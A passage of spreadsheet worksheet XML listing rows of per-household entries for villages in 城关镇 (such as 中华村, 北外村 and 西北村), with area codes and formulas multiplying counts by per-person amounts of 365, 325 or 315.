        <v>1</v>
      </c>
      <c r="H324" s="25">
        <v>365</v>
      </c>
      <c r="I324" s="24">
        <f t="shared" ref="I324:I387" si="5">H324*G324</f>
        <v>365</v>
      </c>
      <c r="J324" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K324" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="325" customHeight="1" spans="1:11">
      <c r="A325" s="23" t="s">
        <v>1012</v>
      </c>
      <c r="B325" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C325" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D325" s="24" t="s">
        <v>1013</v>
      </c>
      <c r="E325" s="24" t="s">
        <v>730</v>
      </c>
      <c r="F325" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G325" s="24">
        <v>1</v>
      </c>
      <c r="H325" s="25">
        <v>365</v>
      </c>
      <c r="I325" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J325" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K325" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="326" customHeight="1" spans="1:11">
      <c r="A326" s="23" t="s">
        <v>1014</v>
      </c>
      <c r="B326" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C326" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D326" s="24" t="s">
        <v>1015</v>
      </c>
      <c r="E326" s="24" t="s">
        <v>869</v>
      </c>
      <c r="F326" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G326" s="24">
        <v>1</v>
      </c>
      <c r="H326" s="25">
        <v>365</v>
      </c>
      <c r="I326" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J326" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K326" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="327" customHeight="1" spans="1:11">
      <c r="A327" s="23" t="s">
        <v>1016</v>
      </c>
      <c r="B327" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C327" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D327" s="24" t="s">
        <v>1017</v>
      </c>
      <c r="E327" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F327" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G327" s="24">
        <v>1</v>
      </c>
      <c r="H327" s="25">
        <v>365</v>
      </c>
      <c r="I327" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J327" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K327" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="328" customHeight="1" spans="1:11">
      <c r="A328" s="23" t="s">
        <v>1018</v>
      </c>
      <c r="B328" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C328" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D328" s="24" t="s">
        <v>1019</v>
      </c>
      <c r="E328" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F328" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G328" s="24">
        <v>1</v>
      </c>
      <c r="H328" s="25">
        <v>365</v>
      </c>
      <c r="I328" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J328" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K328" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="329" customHeight="1" spans="1:11">
      <c r="A329" s="23" t="s">
        <v>1020</v>
      </c>
      <c r="B329" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C329" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D329" s="24" t="s">
        <v>1021</v>
      </c>
      <c r="E329" s="24" t="s">
        <v>334</v>
      </c>
      <c r="F329" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G329" s="24">
        <v>1</v>
      </c>
      <c r="H329" s="25">
        <v>365</v>
      </c>
      <c r="I329" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J329" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K329" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="330" customHeight="1" spans="1:11">
      <c r="A330" s="23" t="s">
        <v>1022</v>
      </c>
      <c r="B330" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C330" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D330" s="24" t="s">
        <v>1023</v>
      </c>
      <c r="E330" s="24" t="s">
        <v>1024</v>
      </c>
      <c r="F330" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G330" s="24">
        <v>1</v>
      </c>
      <c r="H330" s="25">
        <v>365</v>
      </c>
      <c r="I330" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J330" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K330" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="331" customHeight="1" spans="1:11">
      <c r="A331" s="23" t="s">
        <v>1025</v>
      </c>
      <c r="B331" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C331" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D331" s="24" t="s">
        <v>1027</v>
      </c>
      <c r="E331" s="24" t="s">
        <v>494</v>
      </c>
      <c r="F331" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G331" s="24">
        <v>1</v>
      </c>
      <c r="H331" s="25">
        <v>365</v>
      </c>
      <c r="I331" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J331" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K331" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="332" customHeight="1" spans="1:11">
      <c r="A332" s="23" t="s">
        <v>1028</v>
      </c>
      <c r="B332" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C332" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D332" s="24" t="s">
        <v>1029</v>
      </c>
      <c r="E332" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F332" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G332" s="24">
        <v>2</v>
      </c>
      <c r="H332" s="25">
        <v>325</v>
      </c>
      <c r="I332" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J332" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K332" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="333" customHeight="1" spans="1:11">
      <c r="A333" s="23" t="s">
        <v>1030</v>
      </c>
      <c r="B333" s="24" t="str">
        <f>B332</f>
        <v>城关镇</v>
      </c>
      <c r="C333" s="24" t="str">
        <f>C332</f>
        <v>东北一组</v>
      </c>
      <c r="D333" s="23" t="s">
        <v>1031</v>
      </c>
      <c r="E333" s="23" t="s">
        <v>288</v>
      </c>
      <c r="F333" s="24" t="str">
        <f>F332</f>
        <v>4113210103</v>
      </c>
      <c r="G333" s="24"/>
      <c r="H333" s="24"/>
      <c r="I333" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J333" s="24"/>
      <c r="K333" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="334" customHeight="1" spans="1:11">
      <c r="A334" s="23" t="s">
        <v>1032</v>
      </c>
      <c r="B334" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C334" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D334" s="24" t="s">
        <v>1033</v>
      </c>
      <c r="E334" s="24" t="s">
        <v>950</v>
      </c>
      <c r="F334" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G334" s="24">
        <v>1</v>
      </c>
      <c r="H334" s="25">
        <v>365</v>
      </c>
      <c r="I334" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J334" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K334" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="335" customHeight="1" spans="1:11">
      <c r="A335" s="23" t="s">
        <v>1034</v>
      </c>
      <c r="B335" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C335" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D335" s="24" t="s">
        <v>1035</v>
      </c>
      <c r="E335" s="24" t="s">
        <v>947</v>
      </c>
      <c r="F335" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G335" s="24">
        <v>2</v>
      </c>
      <c r="H335" s="25">
        <v>325</v>
      </c>
      <c r="I335" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J335" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K335" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="336" customHeight="1" spans="1:11">
      <c r="A336" s="23" t="s">
        <v>1036</v>
      </c>
      <c r="B336" s="24" t="str">
        <f>B335</f>
        <v>城关镇</v>
      </c>
      <c r="C336" s="24" t="str">
        <f>C335</f>
        <v>中华村</v>
      </c>
      <c r="D336" s="27" t="s">
        <v>1037</v>
      </c>
      <c r="E336" s="27" t="s">
        <v>1038</v>
      </c>
      <c r="F336" s="24" t="str">
        <f>F335</f>
        <v>4113210108</v>
      </c>
      <c r="G336" s="24"/>
      <c r="H336" s="24"/>
      <c r="I336" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J336" s="24"/>
      <c r="K336" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="337" customHeight="1" spans="1:11">
      <c r="A337" s="23" t="s">
        <v>1039</v>
      </c>
      <c r="B337" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C337" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D337" s="24" t="s">
        <v>1040</v>
      </c>
      <c r="E337" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F337" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G337" s="24">
        <v>1</v>
      </c>
      <c r="H337" s="25">
        <v>365</v>
      </c>
      <c r="I337" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J337" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K337" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="338" customHeight="1" spans="1:11">
      <c r="A338" s="23" t="s">
        <v>1041</v>
      </c>
      <c r="B338" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C338" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D338" s="24" t="s">
        <v>1042</v>
      </c>
      <c r="E338" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F338" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G338" s="24">
        <v>1</v>
      </c>
      <c r="H338" s="25">
        <v>365</v>
      </c>
      <c r="I338" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J338" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K338" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="339" customHeight="1" spans="1:11">
      <c r="A339" s="23" t="s">
        <v>1043</v>
      </c>
      <c r="B339" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C339" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D339" s="24" t="s">
        <v>1044</v>
      </c>
      <c r="E339" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F339" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G339" s="24">
        <v>1</v>
      </c>
      <c r="H339" s="25">
        <v>365</v>
      </c>
      <c r="I339" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J339" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K339" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="340" customHeight="1" spans="1:11">
      <c r="A340" s="23" t="s">
        <v>1045</v>
      </c>
      <c r="B340" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C340" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D340" s="24" t="s">
        <v>832</v>
      </c>
      <c r="E340" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F340" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G340" s="24">
        <v>1</v>
      </c>
      <c r="H340" s="25">
        <v>365</v>
      </c>
      <c r="I340" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J340" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K340" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="341" customHeight="1" spans="1:11">
      <c r="A341" s="23" t="s">
        <v>1046</v>
      </c>
      <c r="B341" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C341" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D341" s="24" t="s">
        <v>969</v>
      </c>
      <c r="E341" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F341" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G341" s="24">
        <v>1</v>
      </c>
      <c r="H341" s="25">
        <v>365</v>
      </c>
      <c r="I341" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J341" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K341" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="342" customHeight="1" spans="1:11">
      <c r="A342" s="23" t="s">
        <v>1047</v>
      </c>
      <c r="B342" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C342" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D342" s="24" t="s">
        <v>1048</v>
      </c>
      <c r="E342" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F342" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G342" s="24">
        <v>1</v>
      </c>
      <c r="H342" s="25">
        <v>365</v>
      </c>
      <c r="I342" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J342" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K342" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="343" customHeight="1" spans="1:11">
      <c r="A343" s="23" t="s">
        <v>1049</v>
      </c>
      <c r="B343" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C343" s="24" t="s">
        <v>637</v>
      </c>
      <c r="D343" s="24" t="s">
        <v>1050</v>
      </c>
      <c r="E343" s="24" t="s">
        <v>1051</v>
      </c>
      <c r="F343" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G343" s="24">
        <v>1</v>
      </c>
      <c r="H343" s="25">
        <v>365</v>
      </c>
      <c r="I343" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J343" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K343" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="344" customHeight="1" spans="1:11">
      <c r="A344" s="23" t="s">
        <v>1052</v>
      </c>
      <c r="B344" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C344" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D344" s="24" t="s">
        <v>1053</v>
      </c>
      <c r="E344" s="24" t="s">
        <v>1054</v>
      </c>
      <c r="F344" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G344" s="24">
        <v>1</v>
      </c>
      <c r="H344" s="25">
        <v>365</v>
      </c>
      <c r="I344" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J344" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K344" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="345" customHeight="1" spans="1:11">
      <c r="A345" s="23" t="s">
        <v>1055</v>
      </c>
      <c r="B345" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C345" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D345" s="24" t="s">
        <v>1056</v>
      </c>
      <c r="E345" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F345" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G345" s="24">
        <v>1</v>
      </c>
      <c r="H345" s="25">
        <v>365</v>
      </c>
      <c r="I345" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J345" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K345" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="346" customHeight="1" spans="1:11">
      <c r="A346" s="23" t="s">
        <v>1057</v>
      </c>
      <c r="B346" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C346" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D346" s="24" t="s">
        <v>1058</v>
      </c>
      <c r="E346" s="24" t="s">
        <v>611</v>
      </c>
      <c r="F346" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G346" s="24">
        <v>2</v>
      </c>
      <c r="H346" s="25">
        <v>325</v>
      </c>
      <c r="I346" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J346" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K346" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="347" customHeight="1" spans="1:11">
      <c r="A347" s="23" t="s">
        <v>1059</v>
      </c>
      <c r="B347" s="24" t="str">
        <f>B346</f>
        <v>城关镇</v>
      </c>
      <c r="C347" s="24" t="str">
        <f>C346</f>
        <v>中华村</v>
      </c>
      <c r="D347" s="23" t="s">
        <v>1060</v>
      </c>
      <c r="E347" s="23" t="s">
        <v>320</v>
      </c>
      <c r="F347" s="24" t="str">
        <f>F346</f>
        <v>4113210108</v>
      </c>
      <c r="G347" s="24"/>
      <c r="H347" s="24"/>
      <c r="I347" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J347" s="24"/>
      <c r="K347" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="348" customHeight="1" spans="1:11">
      <c r="A348" s="23" t="s">
        <v>1061</v>
      </c>
      <c r="B348" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C348" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D348" s="24" t="s">
        <v>1062</v>
      </c>
      <c r="E348" s="24" t="s">
        <v>402</v>
      </c>
      <c r="F348" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G348" s="24">
        <v>1</v>
      </c>
      <c r="H348" s="25">
        <v>365</v>
      </c>
      <c r="I348" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J348" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K348" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="349" customHeight="1" spans="1:11">
      <c r="A349" s="23" t="s">
        <v>1063</v>
      </c>
      <c r="B349" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C349" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D349" s="24" t="s">
        <v>1064</v>
      </c>
      <c r="E349" s="24" t="s">
        <v>1065</v>
      </c>
      <c r="F349" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G349" s="24">
        <v>1</v>
      </c>
      <c r="H349" s="25">
        <v>365</v>
      </c>
      <c r="I349" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J349" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K349" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="350" customHeight="1" spans="1:11">
      <c r="A350" s="23" t="s">
        <v>1066</v>
      </c>
      <c r="B350" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C350" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D350" s="24" t="s">
        <v>1067</v>
      </c>
      <c r="E350" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F350" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G350" s="24">
        <v>3</v>
      </c>
      <c r="H350" s="25">
        <v>315</v>
      </c>
      <c r="I350" s="24">
        <f t="shared" si="5"/>
        <v>945</v>
      </c>
      <c r="J350" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K350" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="351" customHeight="1" spans="1:11">
      <c r="A351" s="23" t="s">
        <v>1068</v>
      </c>
      <c r="B351" s="24" t="str">
        <f>B350</f>
        <v>城关镇</v>
      </c>
      <c r="C351" s="24" t="str">
        <f>C350</f>
        <v>北外村</v>
      </c>
      <c r="D351" s="23" t="s">
        <v>1069</v>
      </c>
      <c r="E351" s="23" t="s">
        <v>273</v>
      </c>
      <c r="F351" s="24" t="str">
        <f>F350</f>
        <v>4113210102</v>
      </c>
      <c r="G351" s="24"/>
      <c r="H351" s="24"/>
      <c r="I351" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J351" s="24"/>
      <c r="K351" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="352" customHeight="1" spans="1:11">
      <c r="A352" s="23" t="s">
        <v>1070</v>
      </c>
      <c r="B352" s="24" t="str">
        <f>B351</f>
        <v>城关镇</v>
      </c>
      <c r="C352" s="24" t="str">
        <f>C351</f>
        <v>北外村</v>
      </c>
      <c r="D352" s="30" t="s">
        <v>1071</v>
      </c>
      <c r="E352" s="30" t="s">
        <v>1072</v>
      </c>
      <c r="F352" s="24" t="str">
        <f>F351</f>
        <v>4113210102</v>
      </c>
      <c r="G352" s="24"/>
      <c r="H352" s="24"/>
      <c r="I352" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J352" s="24"/>
      <c r="K352" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="353" customHeight="1" spans="1:11">
      <c r="A353" s="23" t="s">
        <v>1073</v>
      </c>
      <c r="B353" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C353" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D353" s="24" t="s">
        <v>1074</v>
      </c>
      <c r="E353" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F353" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G353" s="24">
        <v>1</v>
      </c>
      <c r="H353" s="25">
        <v>365</v>
      </c>
      <c r="I353" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J353" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K353" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="354" customHeight="1" spans="1:11">
      <c r="A354" s="23" t="s">
        <v>1075</v>
      </c>
      <c r="B354" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C354" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D354" s="24" t="s">
        <v>1076</v>
      </c>
      <c r="E354" s="24" t="s">
        <v>902</v>
      </c>
      <c r="F354" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G354" s="24">
        <v>2</v>
      </c>
      <c r="H354" s="25">
        <v>325</v>
      </c>
      <c r="I354" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J354" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K354" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="355" customHeight="1" spans="1:11">
      <c r="A355" s="23" t="s">
        <v>1077</v>
      </c>
      <c r="B355" s="24" t="str">
        <f>B354</f>
        <v>城关镇</v>
      </c>
      <c r="C355" s="24" t="str">
        <f>C354</f>
        <v>西北村</v>
      </c>
      <c r="D355" s="23" t="s">
        <v>1078</v>
      </c>
      <c r="E355" s="23" t="s">
        <v>1079</v>
      </c>
      <c r="F355" s="24" t="str">
        <f>F354</f>
        <v>4113210106</v>
      </c>
      <c r="G355" s="24"/>
      <c r="H355" s="24"/>
      <c r="I355" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J355" s="24"/>
      <c r="K355" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="356" customHeight="1" spans="1:11">
      <c r="A356" s="23" t="s">
        <v>1080</v>
      </c>
      <c r="B356" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C356" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D356" s="24" t="s">
        <v>1081</v>
      </c>
      <c r="E356" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F356" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G356" s="24">
        <v>1</v>
      </c>
      <c r="H356" s="25">
        <v>365</v>
      </c>
      <c r="I356" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J356" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K356" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="357" customHeight="1" spans="1:11">
      <c r="A357" s="23" t="s">
        <v>1082</v>
      </c>
      <c r="B357" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C357" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D357" s="24" t="s">
        <v>1083</v>
      </c>
      <c r="E357" s="24" t="s">
        <v>370</v>
      </c>
      <c r="F357" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G357" s="24">
        <v>1</v>
      </c>
      <c r="H357" s="25">
        <v>365</v>
      </c>
      <c r="I357" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J357" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K357" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="358" customHeight="1" spans="1:11">
      <c r="A358" s="23" t="s">
        <v>1084</v>
      </c>
      <c r="B358" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C358" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D358" s="24" t="s">
        <v>1085</v>
      </c>
      <c r="E358" s="24" t="s">
        <v>1086</v>
      </c>
      <c r="F358" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G358" s="24">
        <v>2</v>
      </c>
      <c r="H358" s="25">
        <v>325</v>
      </c>
      <c r="I358" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J358" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K358" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="359" customHeight="1" spans="1:11">
      <c r="A359" s="23" t="s">
        <v>1087</v>
      </c>
      <c r="B359" s="24" t="str">
        <f>B358</f>
        <v>城关镇</v>
      </c>
      <c r="C359" s="24" t="str">
        <f>C358</f>
        <v>中华村</v>
      </c>
      <c r="D359" s="23" t="s">
        <v>1088</v>
      </c>
      <c r="E359" s="23" t="s">
        <v>1089</v>
      </c>
      <c r="F359" s="24" t="str">
        <f>F358</f>
        <v>4113210108</v>
      </c>
      <c r="G359" s="24"/>
      <c r="H359" s="24"/>
      <c r="I359" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J359" s="24"/>
      <c r="K359" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="360" customHeight="1" spans="1:11">
      <c r="A360" s="23" t="s">
        <v>1090</v>
      </c>
      <c r="B360" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C360" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D360" s="24" t="s">
        <v>1091</v>
      </c>
      <c r="E360" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F360" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G360" s="24">
        <v>1</v>
      </c>
      <c r="H360" s="25">
        <v>365</v>
      </c>
      <c r="I360" s="24">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J360" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K360" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="361" customHeight="1" spans="1:11">
      <c r="A361" s="23" t="s">
        <v>1092</v>
      </c>
      <c r="B361" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C361" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D361" s="24" t="s">
        <v>1093</v>
      </c>
      <c r="E361" s="24" t="s">
        <v>276</v>
      </c>
      <c r="F361" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G361" s="24">
        <v>2</v>
      </c>
      <c r="H361" s="25">
        <v>325</v>
      </c>
      <c r="I361" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J361" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K361" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="362" customHeight="1" spans="1:11">
      <c r="A362" s="23" t="s">
        <v>1094</v>
      </c>
      <c r="B362" s="24" t="str">
        <f>B361</f>
        <v>城关镇</v>
      </c>
      <c r="C362" s="24" t="str">
        <f>C361</f>
        <v>中华村</v>
      </c>
      <c r="D362" s="23" t="s">
        <v>1095</v>
      </c>
      <c r="E362" s="23" t="s">
        <v>1096</v>
      </c>
      <c r="F362" s="24" t="str">
        <f>F361</f>
        <v>4113210108</v>
      </c>
      <c r="G362" s="24"/>
      <c r="H362" s="24"/>
      <c r="I362" s="24">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="J362" s="24"/>
      <c r="K362" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="363" customHeight="1" spans="1:11">
      <c r="A363" s="23" t="s">
        <v>1097</v>
      </c>
      <c r="B363" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C363" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D363" s="24" t="s">
        <v>1098</v>
      </c>
      <c r="E363" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F363" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G363" s="24">
        <v>2</v>
      </c>
      <c r="H363" s="25">
        <v>325</v>
      </c>
      <c r="I363" s="24">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J363" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K363" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="364" customHeight="1" spans="1:11">
      <c r="A364" s="23" t="s">
        <v>1099</v>
      </c>
      <c r="B364" s="24" t="str">
        <f>B363</f>
        <v>城关镇</v>
      </c>
      <c r="C364" s="24" t="str">
        <f>C363</f>
        <v>北外村</v>
      </c>
      <c r="D364" s="23" t="s">
        <v>1100</v>
      </c>
      <c r="E364" s="23" t="s">
        <v>249</v>
      </c>
      <c r="F364" s="24" t="str">
        <f>F363</f>
        <v>4113210102</v>
      </c>
      <c r="G364" s="24"/>
      <c r="H364" s="24"/>
      <c r="I364" s="24">
